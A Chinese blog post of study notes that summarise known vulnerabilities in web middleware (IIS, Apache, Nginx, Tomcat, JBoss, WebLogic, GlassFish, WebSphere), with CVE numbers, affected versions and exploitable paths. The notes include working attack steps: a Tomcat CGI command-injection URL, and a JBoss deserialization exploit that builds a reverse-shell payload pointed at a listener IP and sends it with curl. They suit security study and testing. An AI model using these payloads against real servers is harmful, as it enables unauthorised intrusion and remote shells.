zoukankan      html  css  js  c++  java
  • web中间件常见漏洞总结笔记

    之前看吐司别人发的个文档,简单记的笔记
    -----
    IIS
        解析漏洞
           IIS 6
               *.asp;.jpg会被当作asp解析
               *.asp/目录下的文件会被当作asp解析
               asa cdx cer后缀也会被当作asp解析
           IIS 7
               在Fast-CGI时,test.jpg在url后加/.php即可解析成php文件
        PUT任意文件写入
           开启了WebDAV并允许写入
        IIS短文件漏洞
        CVE-2017-7269
           2003 r2 IIS 6 开启WebDAV

    Apache
        解析漏洞
           未知扩展名解析漏洞
               1.php.xxx
           AddHandler导致的解析漏洞
               如果有"AddHandler application/x-httpd-php .php",只要有.php后缀即可a.php.jpg
           HTTPD换行解析漏洞 CVE-2017-15715
               影响2.4.0-2.4.29
               上传时文件名为phpinfo.php换行符,访问/phpinfo.php%0a

    Nginx
        Nginx配置文件错误导致的解析漏洞
           info.jpg/1.php
        Nginx空字节任意代码执行漏洞 0.5 0.6 0.7-0.7.65 0.8-0.8.37
           webshell名为a.jpg 访问a.jpg空字节.php
        Nginx文件名逻辑漏洞 0.8.41-1.4.3 1.5.0-1.5.7
           上传时为a.jpg空格,访问a.jpg空格空字节.php
        Nginx配置错误导致的安全问题
           目录穿越
               在配置别名时,忘记加/   访问/files../
    location /files {
       autoindex on;
       alias c:/WWW/home/;
    }
            目录遍历 autoindex 为on

    Tomcat
        任意文件写入CVE-2017-12615
           conf/web.xml配置了readonly=false,可以往服务器PUT文件
        Tomcat远程代码执行 CVE-2019-0232
           9.0.0.M1 ~ 9.0.17, 8.5.0 ~ 8.5.39 7.0.0 ~ 7.0.93
    随意上传lxhsec.bat
     
    http://127.0.0.1:8080/cgi-bin/lxhsec.bat?&C:/WINDOWS/system32/net+user
       Tomcat + 弱口令 && 后台getshell漏洞
       Tomcat manager App 暴力破解

    JBoss 默认端口8080 9990
        JBoss 5/6 反序列化漏洞 CVE-2017-12149
           访问/invoker/readonly 返回500说明存在页面
    利用工具:JavaDeserH2HC,我们选择一个Gadget:ReverseShellCommonsCollectionsHashMap,编译并生成序列化数据:
       生成ReverseShellCommonsCollectionsHashMap.class
    javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
       生成ReverseShellCommonsCollectionsHashMap.ser
    java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.31.232:6666(ip是nc所在的ip)
       利用:
    curl http://192.168.31.205:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
        JBoss JMXInvokerServlet反序列化漏洞
           /invoker/JMXInvokerServlet
        JBoss EJBInvokerServlet反序列化漏洞
           /invoker/EJBInvokerServlet
        JBoss <=4.x JBossMQ JMS反序列化漏洞 CVE-2017-7504
           /jbossmq-httpil/HTTPServerILServlet
        Administration Console弱口令
           /admin-console/
        JMX Console未授权访问
           /jmx-console/

    WebLogic 默认端口7001
        XMLDecoder反序列化漏洞 CVE-2017-10271 & CVE-2017-3506
           /wls-wsat/
        wls9_async_response,wls-wsat反序列化漏洞 CVE-2019-2725
           /_async/
           /wls-wsat/
        WLS Core Components反序列化漏洞 CVE-2018-2628
            通过t3协议触发
        WebLogic任意文件上传漏洞 CVE-2018-2894 10.3.6.0 12.1.3.0, 12.2.1.2, 12.2.1.3
           /ws_utc/config.do
        Weblogic SSRF漏洞 CVE-2014-4210 10.0.2.0, 10.3.6.0
           /uddiexplorer/SearchPublicRegistries.jsp
        Weblogic弱口令后台getshell
           /console

     
    GlassFish 默认端口:8080(Web应用端口,即网站内容),4848(GlassFish管理中心)
         GlassFish Directory Traversal(CVE-2017-1000028)    
           %c0%af作为/ 直接访问/META-INF下的敏感文件
        GlassFish 后台Getshell    

     
     
    WebSphere
       Java反序列化(CVE-2015-7450)
           访问8880端口
        弱口令后台getshell
           6/7版本,后台只需输入admin,无需密码即可登录 websphere/ websphere system/ manager
     
  • 相关阅读:
    Python 实现AEC CBC 加密解密方式
    redis 发布订阅方法与缺陷
    python paramiko 传输下载文件
    Redis 配置文件
    Redis 命令
    window11 | 虚拟机vmWare安装windows11
    十万个为什么 | 文化001-为什么猜灯谜又叫做打灯谜
    ffmpeg | 常用命令使用
    ffmpeg | 常用命令使用
    Adobe系列 | Animate(01)-软件安装
  • 原文地址:https://www.cnblogs.com/junmoxiao/p/11774772.html
Copyright © 2011-2022 走看看